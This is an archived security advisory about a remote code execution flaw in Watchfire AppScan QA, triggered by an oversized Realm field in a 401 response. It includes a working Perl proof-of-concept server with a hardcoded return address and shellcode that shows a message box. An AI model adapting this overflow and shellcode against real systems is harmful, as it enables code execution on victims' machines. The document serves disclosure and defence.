[NT] Watchfire AppScan QA Remote Code Execution

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Watchfire AppScan QA Remote Code Execution
------------------------------------------------------------------------


SUMMARY

AppScan QA is "an automated web application testing tool that provides QA
personnel with security defect analysis and remediation information.
Instead of manually searching for security defects, application testers
trust AppScan QA to detect security defects and vulnerabilities
automatically as an integrated component of enterprise development and
testing processes. AppScan QA automates test script creation,
modification, and maintenance to ensure reliable and repeatable testing".
A vulnerability within Watchfire's AppScan allows remote attackers to
cause the product to execute arbitrary code by overflowing its internal
buffer used to store the HTTP response's Realm field.

DETAILS

Vulnerable Systems:
* AppScan QA version 5.0.609 / Subscription 7
* AppScan QA version 5.0.134

Immune Systems:
* AppScan QA version 5.0.609 / Subscription 8

The vulnerability specifically exists in the way AppScan QA processes 401
HTTP responses. If a custom 401 response is specially crafted, containing
a WWW-Authenticate header with the Realm field consisting of more than 351
characters, a buffer overflow occurs, leading to remote code execution
with the privileges of the user running AppScan QA.

Vendor Response:
* 10/12/2005: Initial Vendor Contact.
* 10/18/2005: Vendor Confirmed Vulnerability.
* 11/02/2005: Vendor Releases Update.
* 12/15/2005: Advisory Public Disclosure.

Exploit:
# Watchfire AppScan QA PoC - Coded by Mariano Nu z Di Croce @ CYBSEC
#
# How to use:
# 1. Run this script to setup the fake web server.
# 2. Scan the server with AppScan QA, either in Interactive or Manual
mode.
# 3. If you get an "You are vulnerable!" popup, you should upgrade
inmediatly.
#
# PoC developed for Windows 2000 Server SP4.
#

#!/usr/bin/perl -w

use IO::Socket::INET;

# Dissable buffering
$| = 1;

# Define 200 OK Responses
my $res200 = "HTTP/1.1 200 OK\r\nHost: www.test.com" . "\r\nDate: Thu, 01
Nov 2005 14:38:20 GMT\r\nServer: Apache\r\nContent-Length: 26\r\n" .
"Keep-Alive: timeout=15, max=100\r\nConnection: Close\r\n" .
"Content-Type: text/html; charset=ISO-8859-1\r\n\r\n<a
href='/admin'>admin</a>";

# Define the 401 Auth Required Header and Tail
my $res401Head = "HTTP/1.1 401 Authorization Required\r\nHost:
www.test.com\r\nDate: Thu, 01 Nov 2005 14:43:53 GMT\r\nServer:
Apache\r\nWWW-Authenticate: Basic realm=\"";

my $res401Tail = "Content-Length: 401\r\nKeep-Alive: timeout=15,
max=100\r\nConnection: Close\r\nContent-Type: text/html;
charset=iso-8859-1\r\n\r\n<!DOCTYPE HTML PUBLIC \"-//IETF//DTD
HTML2.0//EN\">\r\n<html><head>\r\n<title>401 Authorization
Required</title>\r\n</head><body>\r\n<h1>Authorization
Required</h1>\r\n<p>This server could not verify that you\r\nare
authorized to access the document\r\nrequested. Either you supplied the
wrong\r\ncredentials (e.g., bad password), or your\r\nbrowser doesn't
understand how to supply\r\nthe credentials
required.</p>\r\n</body></html>";

# Ret - call ebx - in user32.dll (Windows 2000 Server SP4)
my $ret = pack("l", 0x77e11627);

my $scode = "\x31\xd2\xeb\x35\x59\x88\x51\x06\xbb" .
"\x21\x02\x59\x7c\x51\xff\xd3\xeb" .
"\x33\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\xab\x0c" .
"\x59\x7c\xff\xd3\xeb\x33\x59\x31\xd2\x88\x51\x13" .
"\x52\x51\x51\x52\xff\xd0\x31\xd2\x52\xb8\xbe\x69" .
"\x59\x7c\xff\xd0\xe8\xc6\xff\xff\xff\x75\x73\x65\x72" .
"\x33\x32\x4e\xe8\xc8\xff\xff\xff\x4d\x65\x73\x73\x61" .
"\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc8\xff\xff\xff\x59" .
"\x6f\x75\x20\x61\x72\x65\x20\x76\x75\x6c\x6e\x65\x72" .
"\x61\x62\x6c\x65\x21\x4e";

my $resExploit = $res401Head . "\x41"x347 . "\xeb\x06AA". $ret . $scode .
"\"\r\n" . $res401Tail;

# Initialization of Fake WebServer
my $srv = IO::Socket::INET->new(LocalPort => 80,
Reuse => 1,
Listen => 1 ) || die "Could not create socket: $!\n";

print "Waiting for connections...\n";

while ($cli = $srv->accept()) {
printf "Request from %s\n", $cli->peerhost;
while (<$cli>) {
if (s/(admin)/$1/) {
# If Request is for "admin", launch the exploit
printf "Request for protected resource detected...launching exploit\n";
print $cli $resExploit;
}
else {
# Else send a normal response
print $cli $res200;
}
}
close($cli);
}
close($srv);


ADDITIONAL INFORMATION

The information has been provided by <mailto:mnunez@xxxxxxxxxx> Mariano
Nunez Di Croce.
The original article can be found at:
<http://www.cybsec.com/vuln/CYBSEC_Security_Advisory_AppScanQA_RemoteCodeExec.pdf> CYBSEC Security Advisory AppScanQA RemoteCodeExec (pdf)



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages